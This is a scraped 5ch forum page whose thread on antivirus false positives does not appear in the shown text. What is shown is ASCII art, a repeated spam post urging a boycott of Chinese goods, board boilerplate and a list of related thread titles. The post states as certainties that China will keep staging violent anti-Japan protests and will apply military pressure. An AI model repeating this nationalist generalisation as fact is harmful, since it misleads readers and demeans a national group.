↑ ,. '"´ ̄ ̄ ̄ ̄``ヽ、 /::::::::::::::::::::::::::::::::::::::::::::::\ /::::::::::::;.: --─---─-、:::::::::::::ヽ ./::::::::::::/ィC¨ヽ \:::::::::::l /:::::::::/ └¬'´, ィC¨ヽ';:::::::::! ./::::::::イ / ,. ヽ `¬┘';:::::::! l::::::::::::l /ハ ハ } ヾ::::j こいつ何で俺のことでこんな必死なんだ? {::::{⌒l:! / ` ' ヽ V} . ';:::l ゝリ l ,/ ̄¨ヽ ', }l ヾヽ__j { {,. -−‐‐ヘ {,l ヾ::::| i ヽ ヽェェェェェノ { }:::l ヽ ` ̄¨´ ノ } ヾ;k \_ __ ,/ } "|  ̄ ̄ ̄ ノ _,. -‐"\ フー-、_ '"´ `ヽ、 /
■■中国製品不買運動を広めよう■■
中国は、この先、日本がどんなに謝罪しても、どんなに工場建設や
技術援助等をしても、延々と暴力的反日デモを繰り返す。
将来、南シナ海でフィリピンにしてるような卑劣な軍事的・経済的圧力
をかけてくることは確実。中国製品を買って中国経済を下支えする必要なし
●買い物をする際に、生産国を必ずチェック、中国生産品は絶対買わない
日本人が中国製品を買って、中国経済を下支えする必要はない。
■マイクロソフトの調査活動で判明した、中国製PCに出荷時、
製造過程でマルウェアが混入されていた事実も要注意。
(ソース2箇所)
・Yahoo!ニュース
http://headlines.yahoo.co.jp/hl?a=20120917-00000001-cwj-sci ・税金と保険の情報サイト
http://www.tax-hoken.com/news_aiRYedKXWe.html Pso2 ぷそに ネトゲ クソゲ オンラインゲーム プロ Epic 長谷川亮太 壁紙 Wallpaper イケメン 就活 電車 チンフェ
スーツ 国士舘大学 ネクタイ 黒人 八神太一
このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。 life time: 4506日 16時間 59分 29秒
2ちゃんねるの運営はプレミアム会員の皆さまに支えられています。
運営にご協力お願いいたします。
───────────────────
《プレミアム会員の主な特典》
★ 2ちゃんねる専用ブラウザからの広告除去
★ 2ちゃんねるの過去ログを取得
★ 書き込み規制の緩和
───────────────────
会員登録には個人情報は一切必要ありません。
月300円から匿名でご購入いただけます。
▼ プレミアム会員登録はこちら ▼
https://premium.2ch.net/ ▼ 浪人ログインはこちら ▼
https://login.2ch.net/login.php
read.cgi ver 07.7.23 2024/12/25 Walang Kapalit ★ | Donguri System Team 5ちゃんねる
lud20250213043124caこのスレへの固定リンク: http://5chb.net/r/pcqa/1109609938/ ヒント: 5chスレのurlに http ://xxxx.5chb .net/xxxx のようにb を入れるだけでここでスレ保存、閲覧できます。TOPへ TOPへ
全掲示板一覧 この掲示板へ 人気スレ |
>50
>100
>200
>300
>500
>1000枚
新着画像 ↓「ノートンがvbsウィルスのソースに誤反応3->画像>6枚 」 を見た人も見ています:・テレ朝からTBSに飛び火 赤江珠緒、新型コロナウイルス陽性反応 ネット「報ステ関係者もそろそろ感染爆発やろ?」「テレ朝クラスター ・【速報】石黒氏がノーベル賞を受賞したと知ったネトウヨ達の反応をご覧下さい ・【イタリア】セリエA選手初の感染者…ユベントス イタリア代表DFDFルガーニに新型コロナウイルス陽性反応 ・【Record China】「日本人の名前じゃないか!」=韓国ネットがカズオ・イシグロ氏のノーベル賞受賞に敏感反応[10/6] ★2 ・ガーシー「ある企業のM社長がウクライナ女性を集めて乱交パーティーをしてた」→楽天・三木谷社長が反応、激怒 ★4 [Anonymous★] ・【インフルエンザ】治療薬「ゾフルーザ」耐性ウィルス出現…猛威収まらず“警報レベル超え” ・【安倍元首相銃撃】 韓国の最初の反応「ノーコメント」、事件を糾弾するメッセージさえ出さない…中国は日本語で慰労伝えた[07/10] [LingLing★] ・【物理】高エネルギー原子核衝突反応における運動量を持つ粒子の起源を新たに特定、上智大など [すらいむ★] ・【民主主義】「香港人は移住しないで」日本の“冷たい反応”にも香港人はめげない。当事者が今、日本に一番伝えたいこと ★3 [ブルーベリーフラペチーノうどん★] ・【コロナ】米でワクチン接種後、21人に強いアレルギー反応 [ぐれ★] ・【野球/MLB】エンゼルス・大谷翔平、7試合ぶりスタメン外れる タイガース戦初戦はベンチスタート ・新規が勘違いしていること「神7=上位7名」「ハート型ウイルス=ノースリーブスの楽曲」「チームA=48グループのフラッグシップ」 ・【芸能】森下悠里、抹茶色のピッタリワンピで脇チラ!「初めて女性の脇にドキドキした」とファンが過敏に反応 [フォーエバー★] ・これから露骨な下ネタ出てきた時メンバーは反応するんだろ ・【米ベス・イスラエル・ディーコネス医療センター研究】コロナワクチンの副反応に懸念を抱くと症状が現われやすくなる 「ノセボ効果」 [影のたけし軍団★] ・シャワートイレのリモコンが反応しない ・結局ワクチンの副反応ってどのくらいキツいの? ・ホリエモンがYOSHIKIのライブ自粛ツイートに反応「圧力って奴ですかねこれ」 ・【悲報】おはスタにももち出たのに狼住人反応なし ・【触媒】ハクキンカイロPart27【反応】 ・海外の反応アニメシリーズ Part21 ・気になる女から感謝されたときってどう反応したらいいんだ? ・海外の反応アニメシリーズ Part19 ・【サッカー】2020年「アジア人ベスト11」に南野、吉田、冨安選出 韓国紙反応「韓国人選手としては…」→ソン・フンミンただ1人[12/21] [首都圏の虎★] ・【冬季五輪】平昌冬季五輪スピードスケート・ショートトラック男子日本代表の斎藤慧がドーピング陽性反応 ・在韓米大使殺傷事件に対するケンモウ在日の反応をまとめてみました ・●誠成公倫の御反応で傷ついた人!● ・【サッカー】<日本代表/ウルグアイ戦の予想スタメン>“ロシア組”が先発へ!中島&堂安と柴崎はどんな「化学反応」を見せるか? ・ぼくアンパンマンっぽいの見るとすっごい反応するでしょ ・【菅首相のツイッター】完全に沈黙? 各国首脳からの祝福に無反応、トランプ大統領からもメンションが… ★3 [首都圏の虎★] ・東京新聞・望月イソ子「私たちが知りたいのは朝日が報じた文書のコピーだ」 ネットの反応「朝日に取材しろよ!」「ノイホイさんが…」 ・あなたちゃんのおちんちんを見た時のjkの反応 ・チンKを見たときのつばきファクトリーの反応wwww ・【感染症】富士フイルムのエボラ未承認薬、ノロウィルスにも有効か=英大学 ・妹が新型コロナウィルスになってしまった… ・【武漢ウィルス】スペイン 新型コロナウイルスの感染者 1万人超に 死者は491人 ・コロナウィルスの感染者を見つけた時のワクワクさんは異常 ・【BCG】日本でコロナウィルスの死者が圧倒的に多い 70歳以上はBCG注射を受けていない★5 ・コロナウィルスの騒動に疲れた人 2 ・新型コロナウィルスに感染した中国人が立憲フェスに参加しているというデマを流した奴が出現 ・【MLB】エンゼルスが衝撃の3者連続本塁打 ウォード、トラウト、大谷翔平で一気に逆転 大谷は5戦ぶり5号 [鉄チーズ烏★] ・【武漢ウィルス】中国がトランプ氏に反発 「責任を押し付けるな」 [砂漠のマスカレード★] ・【韓国】ボブ・ディラン氏のノーベル文学賞受賞決定に、韓国ネットも意見さまざま「アロマテラピストが医学賞をもらったようなもの」 ・【フリーソフト】「アバスト無料アンチウイルス」v21.9が公開 〜Windows 11との互換性を向上 [エリオット★] ・車カスのトラックより重さ10トンのバイラル・ジンが転げ落ちる 長浜 ・【フライドチキン】鶏肉不足…新潟のソウルフード“半身揚げ”に影響は? クリスマスを前に鳥インフルで懸念 [1ゲットロボ★] ・【社会】「日本の中に溶け込み暮らすマイノリティを叩くのは卑怯」…信愛書店・原田直子代表、反ヘイトスピーチ本の出版イベント開催★3 ・岡本P「PS4版ドラクエ11とはエンジンのバージョンが違うからアップデートで対応することは無理」 ・【芸能】山下智久、ウィル・スミスの事務所とジャニーズ事務所の“超異例の二重契約”に踏み切るまでの全舞台裏 ・【朗報】セーラームーンがコンセプトのソープを発見! ・何で日本のオフィスにはパーティションが無いの? ・【テニス】セリーナが大坂との全米OP決勝で激怒した審判の罰則判断に批判の声 クリス・エバート「ペナルティーではなく、注意を」 ・【サッカー】セルティックのサポーター、試合前に反英王室の歌と横断幕 スコットランド[09/20] [Ttongsulian★] ・ダーウィンが来た!「2週連続ネコ大特集!荒ぶるオスの真実」★1 ・太田夢莉ちゃんのソロコンが神コンサートだった ・【映画】『アイ・アム・レジェンド』続編製作へ ウィル・スミスとマイケル・B・ジョーダンが共演 [ゴアマガラ★] ・WiMAX2+内蔵のノートパソコンがないのは何で? ・ノートパソコンがiPhoneよりも音質悪いんだが ・【コンビニ】セブン−イレブンが店の駐車場に「仮店舗」建設開始 明け渡しめぐり元オーナーと対立の末 東大阪【ソースに動画あり】 [エリオット★] ・17着スノードラゴン藤田菜七子「スタートしてすぐにナプキンがずれてしまった・・・」 ・ゴートゥキャンペンが勝ちそうなレース ・その昔、Librettoという小型ノートパソコンがあってだな ・【速報】キユーピーが缶入りミートソースの販売終了・・・西日本豪雨で缶の製造ができなくなった為(´・ω・`) ・【悲報】古いソースを相手に過去に向かって吠えているケンモジサンが増加中 ・【悲報】なんJ民絵師「リーマンが性おじを盗撮をしたから暴れた」とソース無し捏造情報を拡散する ・windows10、office搭載、corei 5、メモリ16G、SSD480GBのノートパソコンが4.3万円。情強はレッツノートを中古で買う
15:55:58 up 51 days, 16:59, 3 users, load average: 77.22, 60.73, 42.19
in 0.067428827285767 sec
@0.067428827285767@0b7 on 030605